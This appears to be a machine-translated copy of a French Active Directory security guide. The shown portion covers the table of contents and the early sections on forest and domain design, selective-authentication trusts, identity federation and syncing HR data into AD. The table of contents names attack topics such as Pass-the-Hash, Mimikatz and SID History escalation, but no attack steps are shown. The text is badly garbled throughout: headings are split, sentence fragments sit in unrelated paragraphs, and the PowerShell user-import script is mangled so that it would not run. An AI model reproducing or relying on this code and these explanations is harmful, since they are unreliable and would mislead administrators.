Sie sind auf Seite 1von 186

TEST YOUR SAFETY ACTIVE DIRECTORY


DIRECTORY V2 (version
1.30.2017)

Msreport - Guillaume MATHIEU - All rights reserved


INTRODUCTION ................................................. .................................................. ............................................. 5

1 DESIGNING A SECURE DIRECTORY AND THAT MEETS THE NEEDS OF THE COMPANY ........................... 6

1.1 L ES BASICS .................................................. .................................................. ................... 6


1.2 NALYSER NEED YOUR BUSINESS .................................................. .................................................. ... 7
1.3 C Hoose TOPOLOGY A CTIVE D irectory .................................................. .................................................. . 8
1.3.1 Exception 1: a company with independent entities ......................................... ..................... 8
1.3.2 Exception 2: applications that modify the Active Directory schema ....................................... . 8
1.3.3 Exception 3: hosting ............................................. .................................................. ............. 8
1.3.4 Exception 4: legal constraints ............................................. .................................................. ...... 8
1.3.5 Exception 5: Working with competitors ........................................... ........................................ 9
1.3.6 Exceptions 6: applications hosted in the CLOUD .......................................... ........................ 10
1.4 U SE A CTIVE D Irectory DIRECTORY AS CORPORATE .................................................. ......................... 11
1.4.1 Synchronize the directory with other data sources (HR databases ...) .................................. ... 11
1.4.2 Azure Active Directory Synchronize with Active Directory ........................................... ................ 11
1.4.3 Hosting the enterprise data in the Active Directory ..................................... ... 13
1.4.4 How and who should administer these attributes? .................................................. ......................... 14
1.4.5 Protect attributes that contain sensitive data .......................................... ............. 16
1.4.6 Allow a user to view the value of a protected attribute ..................................... .. 18
1.5 R THE ENFORCER SECURITY SERVICE DNS ................................................. .................................................. ... 19
1.5.1 What is the connection between Active Directory and DNS? .................................................. ....................... 19
1.5.2 Making dynamic DNS update ............................................ .................................................. ........ 20
1.5.3 What are the possible attacks with DNS ......................................... ....................... 25
1.5.4 Securing your DNS servers .............................................. .................................................. ............ 26
1.6 E PRIVILEGE levation WITH THE USE OF SID H istory .................................................. ......................... 32
1.6.1 Make privilege increase with the SID History ......................................... ..................... 32
1.6.2 To remove the SID History ............................................. .................................................. ......... 39

2 GOOD PRACTICES TO DELEGATE ADMINISTRATION DIRECTORY OF ITS ............................... 40

2.1 ES BASIC PRINCIPLES OF THE DELEGATION OF DIRECTORS .................................................. .............. 40


2.1.1 The different types of Active Directory administrators .......................................... ...................... 40
2.1.2 Groups .......................................... with administrative privileges ............................... 40
2.1.3 Delegate administration to a standard user .......................................... ........................... 41
2.2 D ELEGUER The ADMINISTRATION WITH UNITS OF ORGANIZATION .................................................. ..................... 49
2.3 C RRSP OF REGISTERED ACCOUNTS AND DEDICATED TO THE ADMINISTRATION .................................................. ............... 49
2.4 D ELEGUER REQUIRED ONLY TEMPORARY .................................................. ...................................... 49
2.5 D ESACTIVER ACCOUNT AND INVITES THE ADMINISTRATOR ACCOUNT RENAME .................................................. ........ 49
2.6 A UDITER PERMISSIONS ON OBJECTS OF CTIVES irectory .................................................. ........................ 50
2.7 A UDITER THE PERMISSION OF THE OBJECT DMIN SDH OLDER .................................................. ................................ 50
2.8 A CTIVER SLEEP WITH SCREEN PASSWORD .................................................. ............................................... 53
2.9 D ESACTIVER INACTIVE ACCOUNTS .................................................. .................................................. ........... 54
2.10 ES THIRD TOOLS TO STREAMLINE THE DELEGATION OF DIRECTORS .................................................. ............... 56

3 SET A PASSWORD COMPANY POLICY ........................................ ........................... 59

3.1 A The NALYSER ES NEEDS OF NOW FOR THE PASSWORD POLICY .................................................. .. 59
3.2 R Reduce the number of LOGIN / PASSWORD DIFFERENT WORDS .................................................. ........................... 60
3.2.1 Limit the number of login / password to remember ....................................... .............................. 60
3.2.2 Configure your applications to authenticate with Active Directory ........................................ .. 60
3.2.3 Use Windows safe ............................................ .................................................. ........ 61
3.2.4 Using .......................................... identity federation protocols ................................... 61
3.3 ES WORD PASSWORD MANAGEMENT TOOLS M ICROSOFT .................................................. ................................... 62
3.3.1 The password strategies Default Domain Policy ....................................... ................ 62
3.3.2 The PSO (fine-grained password) ......................................... ............................................... 64
3.4 L ES MANAGEMENT TOOLS THIRD PASSWORD ......................................... .................................................. .. 64
3.4.1 Reset his password without contacting the IT team ....................................... .... 65
3.4.2 Ensuring the identity of the user .......................................... .................................................. ...... 65
3.4.3 Configure the complexity of passwords ........................................... ...................................... 65

Msreport - Guillaume MATHIEU - All rights reserved


3.5 T INDING PASSWORD TO USER VIA THE NETWORK .................................................. ........................... 66
3.6 U SING OF MSA MSA G AND OBJECTS FOR SERVICES AND TASKS PLANNED ................................................ 66
3.7 L ISTER ALL ACCOUNTS WHICH HAVE NOT CHANGE PASSWORDS FOR SEVERAL YEARS ............................. 69
3.8 R EINITIALISER OF THE U PASSWORD SERS WITH CARDS CHIPS .................................................. ...... 70
3.9 R ESTREINDRE The USING THE OPTION "P Assword NEVER EXPIRES "................................................. ............ 70
3.10 L E STORAGE PASSWORD WITH A CTIVE D irectory .................................................. .............................. 71
3.10.1 What is a footprint (or HASH)? .................................................. 71 ....................................
3.10.2 The LMHash (LAN Manager hash) ........................................... .................................................. ..... 71
3.10.3 The NTHASH (NT LAN Manager hash) .......................................... .................................................. .. 72
3.11 RECOVER PASSWORD TO WITH A USER LMHash ................................................. .................... 74
3.11.1 The procedure ................................................ .................................................. ................................ 74
3.11.2 How to disable LMHash .............................................. .................................................. ... 77
3.12 RECOVER PASSWORD TO WITH A USER NTHASH ................................................. .................... 79
3.12.1 The procedure ................................................ .................................................. ................................ 79
3.12.2 How to protect passwords ............................................ ............................................... 82
3.13 P Rotecting STORED THE PASSWORD ON MACHINE W INDOWS .................................................. .............. 83
3.13.1 Scheduled services and tasks ............................................ .................................................. . 83
3.13.2 The cache Windows sessions ............................................. .................................................. ...... 84
3.14 G Erer BASE SAM YOUR LOCAL MACHINE WITH M ICROSOFT LAPS ................................................. ............ 86
3.15 D EFINING ONE WORD STRATEGY GOING TARGET .................................................. ........................................... 89

4 STRENGTHENING THE SECURITY OF AUTHENTICATION PROTOCOLS .......................................... ............. 90

4.1 THE PROTOCOL LDAP ................................................. .................................................. ............................... 90


4.1.1 LDAP Simple Bind ............................................... .................................................. .......................... 90
4.1.2 LDAP SASL Bind ............................................... .................................................. ............................ 90
4.2 P NTLM RESENTATION OF PROTOCOL V2 ................................................. .................................................. ... 91
4.3 P RESENTATION PROTOCOL K ERBEROS V5 ................................................. ................................................. 92
4.4 The A DELEGATION OF AUTHENTICATION K ERBEROS .................................................. ............................................ 96
4.5 The ES GOOD PRACTICES TO IMPROVE THE SAFETY OF A DIRECTORY OF CTIVE irectory ....................................... 98
4.5.1 Block LDAP Simple Bind connections without SSL / TLS ........................................ ...................... 98
4.5.2 Enable LDAP traffic signing ............................................ .................................................. .. 98
4.5.3 Disable NTLM authentication protocols ........................................... .......................... 101
4.5.4 Configure Kerberos encryption algorithm ............................................. ............................. 104
4.5.5 Configure the time synchronization .............................................. ........................................... 106
4.5.6 Prohibit Kerberos delegation for administrative accounts ........................................ .. 107
4.6 E Levation PRIVILEGED WITH TECHNICAL NTLM P ASS THE H ASH .................................................. .............. 108
4.6.1 Understanding NTLM attack Pass The Hash ........................................... ............................... 108
4.6.2 The procedure for NTLM attack Pass The Hash ......................................... ........................ 109
4.6.3 Protect against attacks NTLM Pass The Hash ......................................... ....................... 109
4.7 S E PROTECT AGAINST ATTACKS BY T HE K ERBEROS T IckeT WITH A TOOL AS M IMIKATZ ........................ 109

5 THE MANAGEMENT SIGN WITH ACTIVE DIRECTORY ........................................... ...................................... 110

5.1 T HE SID ................................................. .................................................. ............................................... 110


5.2 L ES PERMISSION .................................................. .................................................. ................................. 111
5.3 L ES PRIVILEGES ................................................ .................................................. ....................................... 113
5.4 ES PROCESS .................................................. .................................................. .................................... 115
5.5 L ES SERVICES .................................................. .................................................. ....................................... 115
5.6 L ES TOKENS ACCESS (A CCESS TOKEN) .................................................. .................................................. ....... 119
5.7 ELEVATION OF PRIVILEGE WITH THEFT OF A TOKEN OF ACCESS .................................................. ............................ 121
5.7.1 Introducing the INGOGNITO tool ............................................ ................................................. 121
5.7.2 How to use the tool ......................................... INCOGNITO ..................................... 122
5.7.3 How to block the INCOGNITO tool? .................................................. ..................................... 122

6 INDUSTRIALIZE AND SECURE THE DEPLOYMENT OF CONTROLLERS FIELD ............................ 123

6.1 D EPLOYER ONLY ONE SUPPORTED VERSION W INDOWS S erver .................................................. ........ 123
6.2 H EBERGER DOMAIN CONTROLLERS IN A SECURE LOCATION ......................................... ............ 124
6.2.1 What are the risks if an attacker has physical access to a domain controller? ........ 124

Msreport - Guillaume MATHIEU - All rights reserved


6.2.2 How to prevent an attacker to access the Ntds.dit file? ........................................... 127
6.3 D EPLOYER THE SECURITIES ADJUSTMENTS ON FIELD CONTROLLERS .................................................. ... 128
6.3.1 Why is it necessary to deploy security patches? .............................................. 128
6.3.2 Installing security patches on domain controllers ....................................... 131
6.4 R EDUCING THE SURFACE ATTACK DOMAIN CONTROLLERS .................................................. ................... 131
6.5 NEVER STOP THE SERVICE W INDOWS E IREWAL The ................................................. ..................................... 132

6.6 C The iles UAC ................................................ .................................................. ............................... 134


6.7 D ESACTIVER THE CACHING OFFLINE SESSIONS .................................................. ...................... 137
6.8 R THE ENFORCER SECURITY B FFICE REMOTE .................................................. ......................................... 138
6.8.1 Use administrative workstations .......................................... ............................... 138
6.8.2 Configure Remote Desktop service ............................................ .......................................... 139
6.8.3 Allow only administration tools ........................................... ............................ 140
6.8.4 Configure Remote Desktop client ............................................ ............................................. 141
6.8.5 Use the "restrictedAdmin" ............................................ .................................. 141
6.9 R ESTREINDRE ACCESS AI NTERNET FROM THE FIELD OF CONTROLLERS .................................................. ........ 143
6.10 C Iles PASSWORD DSRM ................................................. .................................................. ...... 144
6.11 D EPLOYER CONFIGURATION STANDARD ON ALL AREA CONTROLLERS ......................................... 144
6.11.1 Configure IPv6 ................................................ .................................................. ......................... 144
6.11.2 Deploy an updated antivirus and configure exclusions ......................................... ................... 145
6.11.3 Use the Security Configuration Wizard ......................................... ............................. 146
6.11.4 Test your image in a qualifying environmental .......................................... ............ 149
6.11.5 Some experience feedback on the deployment of Windows 2012 R2 ................................. 150

7 IMPLEMENTING PREVENTION OF POLITICAL RISK ......................................... .............. 152

7.1 UDITER CHANGE (NEW ITEMS) AND DRAW THE SIGN AT THE DIRECTORY OF A CTIVE irectory WITH AUDIT W INDOWS ..................................................
.................................................. ................................... 152

7.2 A NALYSER JOURNAL S ECURITY .................................................. .................................................. ............. 155


7.3 A UDITER SAFETY OF YOUR DIRECTORY .................................................. ................................................. 170
7.4 S UPERVISER YOUR DIRECTORY OF A CTIVE irectory .................................................. ........................................ 171
7.4.1 Introducing the DCDIAG tool ............................................ .................................................. ...... 172
7.4.2 Deployment of the solution .............................................. .................................................. .......... 172
7.5 D Ake sure ' COMPUTER RECOVERY PLAN (IRP) A CTIVE D irectory .................................................. ....... 173
7.6 P Rotecting YOUR SAVED A CTIVE D Irectory IFM AND FILES (I nstall FROM MEDIA) .......................... 173

8 ................................................. NOTES .................................................. ........................................... 175

8.1 P ROCEDURE DEPLOYMENT OF AN AUTHORITY CERTIFICATION M ICROSOFT .................................................. .. 175


8.2 P ROCEDURE FOR ACTIVATE IT B L OCKER ON A FIELD CONTROLLER .................................................. ... 178
8.2.1 Introducing the solution to encrypt hard drives domain controllers ............. 178
8.2.2 Implementing BitLocker on Windows domain controllers 2012 R2 ....................... 179
8.3 B IBLIOGRAPHY: .................................................. .................................................. .................................. 186
8.3.1 Recommended Book ................................................ .................................................. ..................... 186
8.3.2 Microsoft Active Directory Technical Specification ............................................. ........................ 186
8.3.3 To understand the NTLM and Kerberos Active Directory ................................... 186
8.3.4 Recommendations on Active Directory security ANSII ....................................... ........ 186
8.3.5 Microsoft recommendation on the safety of the Active Directory directory ................................ 186
8.3.6 Recommendation Service Configuration Terminal .......................................... ... 186
8.3.7 Other Links ................................................ .................................................. ................................ 186

Msreport - Guillaume MATHIEU - All rights reserved


INTRODUCTION
At the end of 2014, many studies show that CIOs have two main priorities:
1. The migration to cloud services like Office 365, Windows Azure to enhance the reliability and / or reduce the cost of services provided by DSI.

2. Strengthening the security of their IT infrastructure. The year 2013 was marked by the revelations of Edward SNOWDEN on NSA practices.
The year 2014 was marked by the hacking of Sony Pictures and leakage of confidential data.

These two topics directly affecting the Active Directory domain infrastructure. The CLOUD projects require infrastructure implementation
allowing users to authenticate with their login / Active Directory password to access services hosted online. Strengthening of IT infrastructure
security through strengthening the security of Active Directory. It is necessary to remember that an Active Directory domain administrator is the
default local administrator of all machines in the domain (servers and workstations).

In it, we see how:


• Designing an Active Directory secure and meets the company's needs.
• Delegate administration of its Active Directory.
• Defining a corporate password policy.
• Enhancing the security of Active Directory authentication protocols.
• Manage permissions with Active Directory.
• Industrialize and secure deployment of domain controllers.
• Set up a risk prevention policy.

Msreport - Guillaume MATHIEU - All rights reserved


1 DESIGNING A SECURE DIRECTORY AND THAT MEETS THE NEEDS
NOW
1.1 THE BASICS

Microsoft's Active Directory organizes around 4 types of objects, forests, domains, organizational units and the trust relationships.

A forest is a set of domains that share the same configuration, the same pattern and the same global catalog. In a forest each domain trusts
directly or indirectly other areas of the forest. These trust relationships can not be deleted. The forest is the security boundary of Active Directory.
To ensure that users of an entity does not have access to the directory of another entity, two separate forests must be created.

A domain is a partition in an Active Directory forest. The Administrative default owner of a domain is the group Domain Admins of this area. The
group Enterprise Admins who has permissions on all objects in all areas of the forest is in the root domain. An administrator of the forest root
domain can therefore have all the rights to all areas of the forest. This is usually why the root domain is not used in the structures featuring a
forest with multiple domains.

An organizational unit (OU) is a container within a domain. An OR can contain user accounts, groups, computers, accounts and other OR
(among others). The OR therefore possible to organize the directory. It is possible to delegate the administration of the contents of an OU to a
group and / or specific user groups and apply policies to users and computers in that OU.

A trust relationship is a relationship of trust established between two Active Directory domains (or between an Active Directory domain and a
Windows NT4 domain or from an Active Directory domain and a non-Windows Kerberos realm). When the field " AT " trusts domain " B "Domain
administrators" AT "Can set permissions on a machine in the field" AT "For users / groups / computers in the domain" B ". Domain users " B "So
can access domain resources A. trust relationships enable among others to extend to both areas the group's scope Authenticated users. This
group has by default the right to log on to a Windows workstation and many permissions on the file system. In forests natively, 2003, it is
possible to create authentication type of trust relationships selective. With this approval, the group's scope Authenticated users is not extended.
To allow a B-domain user to access the server domain SRV2012B " AT "Domain administrator" AT "Should give the right Allowed to authenticate the
domain user account " B "At the computer account SRV2012B in the area "A".

Msreport - Guillaume MATHIEU - All rights reserved


is also created for compatibility with NT4 domains. For more information about trust relationships I invite you to read chapter 6 cross-relationships
the following document:
http://www.ssi.gouv.fr/IMG/pdf/Aurelien_Bordes_-
_Secrets_d_authentification_episode_II_Kerberos_contre-attaque.pdf

1.2 ANALYZING THE NEED FOR YOUR BUSINESS

The topology of your Active Directory (forest, domain, organizational units) must match the needs of your company. Before designing your
directory architecture you need to analyze the operation of your business.

How is your company organized?


Your company been split into several entities / subsidiaries?
Users of each entity they need to work with users of other entities? Several entities of a company can share the same directory architecture
however may remain independent from the rest of society.

Do you have a centralized or decentralized IT management (CIO by an entity at your company)?

in the container System each of the two areas. A special user account in the container Users
What are the technical constraints of your company?
Do you have applications that modify the Active Directory schema as Exchange, Lync, SCCM or store their configuration in Active Directory
(usually in the configuration partition)?

Host your servers, applications and data to your customers? Do you publish applications on the Internet (extranet, email, business
applications)? Do you provide access to your information system providers, partners? These providers, they can become partners / be potential
competitors? What is the risk of data theft?

What are the legal constraints of your company?


Some entities are subject to the legal constraints that require them to have their own information system should be isolated from other entities
of society. This is especially true if an entity working in the finance industry, defense and government institutions.

What data do I store in my Active Directory?

Msreport - Guillaume MATHIEU - All rights reserved When a trust relationship is established, a TDO object ( Trusted Domain Object) is created
Active Directory is an LDAP directory. It is mainly used to authenticate users but can also host information at user accounts as telephone
number, email address, employee number, type of account (supplier, employee, service account).

1.3 LAYOUT SELECT ACTIVE DIRECTORY

The more you add domains / forests in an Active Directory architecture, more administration becomes complex. For this reason, the Active
Directory architecture is a priority area in a forest (mono-domain) with some exceptions / special cases.

1.3.1 E XCEPTION 1: A COMPANY WITH INDEPENDENT ENTITIES

Create a forest with an area for each entity of the company if these two conditions are met:
• The management of the company wants to sell this entity shortly.
• The exchanges between users of the entity and those of other corporate entities are reduced (only the direction).

1.3.2 E XCEPTION 2: OF APPLICATIONS THAT MODIFY THE SCHEME A CTIVE D irectory

Create a forest with a domain to host applications that modify the Active Directory schema. This applies especially for internally developed
applications that need to create attributes / specific object classes. It is indeed not possible to delete an attribute / object class added to the
Active Directory schema . It applies partially for applications such as Microsoft Exchange, Microsoft Lync. Microsoft tests the compatibility of
schema extensions between different applications. Note, however, two known issues:

• OCS 2007 R2 (former Lync trade name) no longer works correctly after Active Directory schema update for the deployment of Windows
2008 R2 domain controller. The solution is to reapply the schema extension for OCS 2007 R2 after the schema extension for Windows
2008 R2 Domain Controllers:

http://support.microsoft.com/kb/982020/en-us

• It is not possible to launch the schema extension for OCS 2007 R2 after you have updated the schema for Lync 2010. This can cause
problems in the migration scenario framework LCS 2005 towards Lync 2010 ( Passing by OCS 2007 R2). This problem is very serious
because the only solution is to completely restore the forest (Forest Recovery). I invite you to read this article carefully http://blogs.technet.com/b/askpfeplat/arc

In all cases, a schema update must be tested a qualifying environmental copy of the production environment. A Complete walkthrough to create
this type of environment is provided to the following address: http://msreport.free.fr/?p=154 .

1.3.3 E XCEPTION 3: HOSTING THE

If you are a host, I invite you to deploy a specific forest to authenticate users of your company and a second forest to authenticate your
customers (see a forest per customer). You can set a trust relationship selective authentication to enable IT to your company to administer or
forests dedicated to your customers.

1.3.4 E XCEPTION 4: LEGAL RESTRICTIONS

If the activity of one of your units or your services requires complete isolation, you must create a forest with a field for this entity / service and
establish a trust relationship with selective authentication ( if you need to share resources between entities).

Msreport - Guillaume MATHIEU - All rights reserved


1.3.5 E XCEPTION 5: WORKING WITH COMPETITORS

Several solutions are possible if you provide access to your business applications to employees of another company that is a partner on a file /
project as well a competitor on other issues / projects.

• Solution 1: create Active Directory user accounts for these users in your domain.

• Solution 2: create another domain in your forest for these users.


• Solution 3: creating accounts for external users in a second forest and create a trust relationship with selective authentication.

• Solution 4: create local accounts on workstations and servers on which the partner has to work.

• Solution 5: use identity federation solution (ADFS, PING Identity or other). Your partner can authenticate users with accounts of its
directory to access your application. Your application must be compatible with identity federation protocols such as SAML.

1.3.5.1 Solution 1: Use the production domain

All domain users are members of the group Authenticated users and the group Domain users. User accounts for providers / competitors thus
have access to all domain machines. For restricting such access, apply the following procedure: Create Group GG_EXTERNAL_USERS.

Add external users to groups GG_EXTERNAL_USERS.


Configure the external user account so that it can not open sessions on some machines. To do this, go into the properties of the user account
tab Account then click the button " Log on To "And check the box The Following computers. Enter the list of machines on which the user can open
the session. The underlying attribute manages up to 1024 values. This method prevents logon locally but the user can still access unauthorized
machine via the network (access to shares). An alternative to this method is to configure the GPO setting Deny logon locally group

GG_EXTERNAL_USERS and apply the GPO on all field machines except those to which external users are allowed to connect. Configure the
GPO setting Deny Access to this computer from the network group

GG_EXTERNAL_USERS and apply this GPO on Windows machines reserved for internal users. This setting will prevent external users to
access internal resources.

1.3.5.2 Solution 2: create a new domain in the forest

This solution has no interest in security. In addition, Active Directory environments with forests containing several areas are more complex to
manage (DNS configuration, increasing the number of required domain controllers). By default, Active Directory creates trust relationships
between domains in the same forest that can not be removed and which can not enable selective authentication. A user in domain A will be

Authenticated Users in domain B and vice versa. We are left with the safety limits of Scenario 1.

1.3.5.3 Solution 3: create a domain in a new forest

This is the scenario that offers the best level of security. The principle is:
1. Create a domain in a separate forest.
2. Create a two-way trust (see unidirectional as needed) between the two forests (inter-forest trust relationship).

3. Enable selective authentication at the trust relationship.


4. Configure access in the fields. To give access to a resource Y1 member of the Y field (Y forest) to a user of the domain X (forest X), you must
give the right
Allowed to authenticate the computer account of the machine Y1 to the domain user X (forest X). Otherwise if the user tries to access the
resource, it has the following error message:

Msreport - Guillaume MATHIEU - All rights reserved


You must configure the permissions at the computer accounts of resource servers (permission Allowed to authenticate ).

Some applications can not authenticate with accounts in two separate forests. It is mandatory to enable selective authentication at the trust
relationship if we have the same constraints as the scenario 1 and 2.

1.3.5.4 Solution 4: create local accounts

This solution may work if local users do not have the right administrator on local stations. Wherever possible, the machines (servers /
workstations) should then be in a workgroup. We will see in the following paragraphs a local administrator who has the privilege debug programs for
privilege elevations by performing a type of attack Pass the NTLM HASH or Pass the Kerberos ticket.

1.3.6 E XCEPTIONS 6: HOSTED APPLICATIONS IN THE CLOUD

In general, the applications hosted in the Cloud offers two authentication methods:

• Authentication with the local application directory: This mode allows users to access services without basic configuration but requires
that the user stores a new login / password. We will see that it is necessary to minimize the number of login / password that the user must
remember the words to enhance the security of Active Directory.

• Authentication Directory Active Directory / LDAP to the company: these applications allow the usually via support identity federation
protocols such as SAML ( Security Assertion Markup Language ).

identity federation protocols is based on four elements:


disadvantages:
• The main You: it ishave two Active
the user accountDirectories
that wantstotomanage.
access the application in the cloud.
• The identity provider (or IDPs) : is the Active Directory (or other LDAP directory).

• The service provider (SP): it is the application in the Cloud (SalesForce, Office 365 ...)
• The identity federation solution: it creates a relationship of trust between the IDP (Active Directory) and the SP (the Cloud application).
The goal is to allow users to access / authenticate Cloud application (Salesforce, Office 365) with their Active Directory user account
without giving direct access to the directory to the cloud application. Ping Identity or Microsoft ADFS are identity federation solutions.

How it works (eg with a type of scenario Initiated SP):


The Principal will request access to the services of the service provider. The service provider will then ask for a token (SAML for example) to the
Principal with identity federation solution (servers Ping Identity, Microsoft ADFS ...). The identity federation solution will build the token from the
information exchanged with the identity provider (Active Directory or an LDAP directory) and send it to the Principal. The Principal will provide
this token to the service provider (the Cloud application). The Cloud app will generate a cookie or a ticket to give the user access to the
firewall. The specified account is not allowed to authenticate to the Machine ". The solution is very secure by default but has the following
application.

The advantage of this solution is that the host application does not have direct access to the directory. The application has access only to
identity federation server.
The relationship of trust applies only to a specific application. The scope of this trust relationship is more restricted than that established with a
trust relationship.

I invite you to read the documentation of the solution ping Federate to better understand how identity federation protocols (example
implementation with Office 365)
http://documentation.pingidentity.com/display/PF66/PDF+Downloads
http://documentation.pingidentity.com/pages/viewpage.action?pageId=10518544

Msreport - Guillaume MATHIEU - All Rights Reserved " Logon Failure. The machines you are logging onto is protected by an authentication
If you do not want to implement an identity federation solution, you must create a trust relationship with selective authentication between your
forest (containing your user accounts) and the forest that contains the resources used by the application hosted in the Cloud. This reduces the
security level of your directory.

It is not recommended to create a standard user account and open access LDAP / LDAPS. With this account, the provider of the cloud
implementation would have a read-only access to almost all directory data (including the configuration of this book).

1.4 USE AS ACTIVE DIRECTORY DIRECTORY CORPORATE

Active Directory is a standard LDAP directory that can be used to host the data (coordinates, HR information) to your users as the phone
number, email address, employee number, type of account (supplier, employee , service account), service, entity or function.

Applications that rely on Active Directory as Exchange, Lync, SharePoint will have access to this data. A user can thus find via the email client
(Outlook, OWA ...) contact information (phone, address ...) to another user. Host HR business data in Active Directory, however, poses the
following questions:

• How to replicate data from HR databases to Active Directory?


• How to host all the data at the Active Directory?
• How and who should administer these attributes?
• How to protect attributes containing sensitive data?
• How to make a standard user can not see the value of certain attributes (with confidential data)?

• How to synchronize Active Directory with other directories?

1.4.1 S YNCHRONISER The DIRECTORY WITH OTHER DATA SOURCES (BASES ... RH)
Sample implementation with Office 365: http://technet.microsoft.com/fr-fr/library/jj205456.aspx
synchronization solutions between different data sources (SQL Server, LDAP) as Forefront
Identity Manager (FIM / MIM 2016) or Talend Open Studio for Data
Integration exist but their cost of implementation is important (licensing, benefits). A simpler alternative is to generate an HR foundation for
export to CSV and use a PowerShell script to update the attributes of user accounts. The PowerShell import script can be run every day or
every hour.

The PowerShell script below allows for example to create user accounts in the Active Directory using a CSV file. The CSV file must use
semicolon-separated and contain the columns " first name "" name "" such "And" login "Complemented each user to create.

Import-Module ActiveDirectory
$ Base = Import-CSV -Path C: \ adm \ base.csv -UseCulture foreach ($ line
basis in $) {

New ADUser - GivenName $ ($ line.prenom) - Name $ ($ line.nom) - OfficePhone $ ($ line.tel) -


SamAccountName $ ($ line.login)
$ Passwd2 = ConvertTo-SecureString $ -String ($ line.mdp) -AsPlainText -force Set-ADAccountPassword $
-Identity ($ line.login) -NewPassword $ passwd2 Enable-ADAccount $ -Identity ($ line.login)}

1.4.2 S YNCHRONISER A zure A CTIVE D Irectory WITH A CTIVE D irectory

Take the example of a company that wants to migrate to Office 365 Enterprise E3 plan. This solution is in fact based on the following 6 products
are all based on a book called Azure

Msreport - Guillaume MATHIEU - All rights reserved There is also an open source solution called Shibboleth ( https://shibboleth.net/about ).
Active Directory ( a mix between a standard Active Directory and a directory Active Directory Lightweight Services)

• Exchange Online: users have a mailbox 50GB with all the collaboration features of Exchange 2013 Server. With the license Office 365
Plan E3, users have unlimited email archiving. Users can encrypt / sign their mail with S / MIME or rely on the solution Azure Active
Directory Rights Management for secure email exchanges.

• Lync Online: users have the features of presence, instant messaging, audio conferencing and video conferencing Lync 2013 Server.

• SharePoint Online: users have an online storage space of 1TB they can synchronize their workstation with the client Onedrive for
Business
(Formerly SharePoint Workspace and SkyDrive Pro).
Users can also have all types of SharePoint 2013 sites (collaborative intranet, team websites). Office 365 secures all SharePoint data with
Azure Active Directory Right (based on Right Management Services).

• Azure Active Directory Rights Management: Office 365 Plan E3 incorporates the functionality of Active Directory Rights Management
Services. This solution allows you to encrypt / sign your documents, prevent the transfer of documents out of your business, block features
like copy / paste, printing, editing your documents. For more information, see the following article: http://technet.microsoft.com/fr-fr/library/jj585026.aspx

• Yammer Enterprise: Microsoft has recently purchased an enterprise social network solution. You can see Yammer as a kind of Facebook
for business (creating events, link sharing, polls, creating groups, file sharing, conversations, articles). For more information, see http://www.zdnet.com/yammer
.

• Office 365 ProPlus: this is a special version of Office 2013 Professional. This version requires an Office 365 account to activate (periodic
activation every 30 days) and has a new streaming system called accelerated deployment Click to Run. For more information, see http://technet.microsoft.com/e

• Applications for mobile devices / tablets: Microsoft makes available all the tools of the Office 365 suite (Outlook Web Access, Lync,
Word, Excel ...) on mobile devices and tablets. Users can download in Office 365 Office 365 ProPlus on their IPAD / IPHONE.

Administrators want in general:


• That the information in Active Directory as the user telephone number, email address are replicated in the directory Azure Active
Directory. They can access all this information from clients such as Outlook, Lync.

• Define what resources (user accounts / groups) respond with Azure Active Directory.
• Prevent information (confidential attributes) to replicate the directory Azure Active Directory.

• The user connects to Office 365 with his login / Active Directory password.

• Able to view all the resources in its directory management interfaces Office 365 (Office 365 portal or PowerShell modules Office 365).
Example: A user called melanie.mathieu was created in Active Directory. Now you want to assign a license Office 365 Enterprise Plan E3
this user so that it can connect to Office 365 services.

These actions are possible with synchronization tools as Azure Active Directory Sync
(AD-SYNC, http://www.microsoft.com/en-us/download/details.aspx?id=44225 ). This tool is actually based on the engine Forefront Identity
Manager 2010 It will allow:

Msreport - Guillaume MATHIEU - All rights reserved


• Define the directory of resources that will be replicated by selecting the OR allowed to replicate.

• To define user objects that will respond based on the value of one or more attributes.

• Possibly replicate the user password in the directory Azure Active Directory. This solution allows in part to avoid the use of an identity
federation protocol but a copy Hash derived from the user's password in the directory Azure Active Directory. This could pose security
problems even if Microsoft is committed to the fact that no mathematical function retrieves the Hash Active Directory user account
password from the copied version of the Hash password in Azure active Directory.

1.4.3 H EBERGER DATA OF NOW IN A DIRECTORY OF CTIVE irectory

Basic, Active Directory has many attributes to host users' data. I invite you to read the article http://msdn.microsoft.com/en-us/library/ms683980(v=vs.85).aspx
detailing the fields available in the base Active Directory schema (after deployment of the first domain controller). If you need more attributes,
you can prepare the Active Directory schema for Exchange 2013 (does not require the purchase of Exchange 2013 licenses). This schema
extension will allow you to use the following attributes to host your data at user accounts objects:

• extensionAttribute1
• extensionAttribute2
• ...
• extensionAttribute15
• msExchExtensionCustomAttribute1
• ...
• msExchExtensionCustomAttribute5 Attributes extensionAttribute are of type string. The LDAPDisplayName this attribute begins extensionAttribute
(example: extensionAttribute1 but their adminDisplayName

starts with ms-Exch-Extension-Attribute- ( example: ms-Exch-Extension-Attribute-1).


Attributes msExchExtensionCustomAttribute are tables that allow up to 1300 entries of type string.

Other attributes appear as available msDS-cloudExtensionAttribute1 to msDScloudExtensionAttribute20 and msExchExtensionAttribute16 to


msExchExtensionAttribute45. However, Microsoft does not recommend using them because they are reserved for future use.

To deploy the Exchange 2013 schema extension:


1. Confirm the proper functioning of your Active Directory backups.
2. Disable antivirus real time on the domain controller to the role of schema master.
3. Log in with a user member of the group " Schema admins "And" Enterprise admins ". Download the installation of Exchange 2013 at: http://technet.microsoft.com/fr
. Double click the file and extract the installation sources in

C: \ _ adm \ sources \ Exchange2013 on the domain controller with the master role of Active Directory schema.

4. Disable inbound / outbound replication of this domain controller with the following commands (in the example below SRV2012R2 is the
domain controller name with the role of schema master):

repadmin / options + SRV2012R2 DISABLE_OUTBOUND_REPL repadmin / options +


SRV2012R2 DISABLE_INBOUND_REPL
5. Launch the PowerShell command prompt as an administrator and run the following command:

C: \ _ adm \ sources \ Exchange2013 \ setup.exe / PrepareSchema / IAcceptExchangeServerLicenseTerms

6. Once the Schema update is complete, validate the proper functioning of the domain controller. Reactivate the incoming / outgoing replication
to the domain controller with the pattern master role by entering the following commands:

repadmin / options SRV2012R2 -DISABLE_OUTBOUND_REPL repadmin / options


SRV2012R2 -DISABLE_INBOUND_REPL

Msreport - Guillaume MATHIEU - All rights reserved


1.4.4 C OW AND WHO SHOULD GIVE THIS ATTRIBUTES?

The administration consoles like Active Directory Users and Computers do not display the values ​of all the attributes available. It is not possible
to change this behavior. Since Windows 2008 R2, you have tab attribute Editor in the console Active Directory Administration Center and in the
console Active Directory Users and Computers ( display mode

Advanced features).

You also have a PowerShell module with Windows 2008 R2 domain controllers to manage the contents of your Active Directory. If you have
